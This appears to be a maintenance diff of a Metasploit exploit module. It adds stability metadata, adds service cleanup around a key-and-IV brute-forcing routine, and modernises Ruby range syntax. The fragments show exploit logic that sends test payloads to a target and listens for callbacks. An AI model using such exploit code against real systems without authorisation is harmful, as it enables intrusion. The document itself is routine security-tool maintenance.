@@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'DisclosureDate' => '2017-07-20',
         'DefaultOptions' => { 'WfsDelay' => 5 },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 
@@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote
         print_warning('Trying all possible KEY and IV combinations...')
         print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
         start_service
-        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
+        begin
+          vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
 
-        test_passphrases
+          test_passphrases
 
-        # If no working passphrase has been found,
-        # wait to allow the the chance for the last one to callback.
-        if @passphrase.empty? && !@dry_run
-          sleep(wfs_delay)
-        end
-        if service
-          stop_service
+          # If no working passphrase has been found,
+          # wait to allow the the chance for the last one to callback.
+          if @passphrase.empty? && !@dry_run
+            sleep(wfs_delay)
+          end
+        ensure
+          cleanup_service
         end
+
         print "\r\n"
         if !@passphrase.empty?
-          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
+          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found")
         end
       end
     end
@@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
                         print_good("Possible Base Key Value Found: #{key}")
                       else
                         print_good("KEY Found: #{key}")
-                        print_good("IV Found: #{@passphrase[8..-1]}")
+                        print_good("IV Found: #{@passphrase[8..]}")
                       end
                       vprint_status(format('Total number of Keys tried: %<n_tried>d', n_tried: i))
                       vprint_status(format('Time to crack: %<c_time>.3f seconds', c_time: elapsed.to_s))
@@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
     @decryptor.key = key
     found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
     # Find all possible IVs for the first ciphertext
-    brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
+    brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..])
 
     # Reduce IV set by testing against other ciphertexts
     cipher_texts.drop(1).each do |cipher_text|
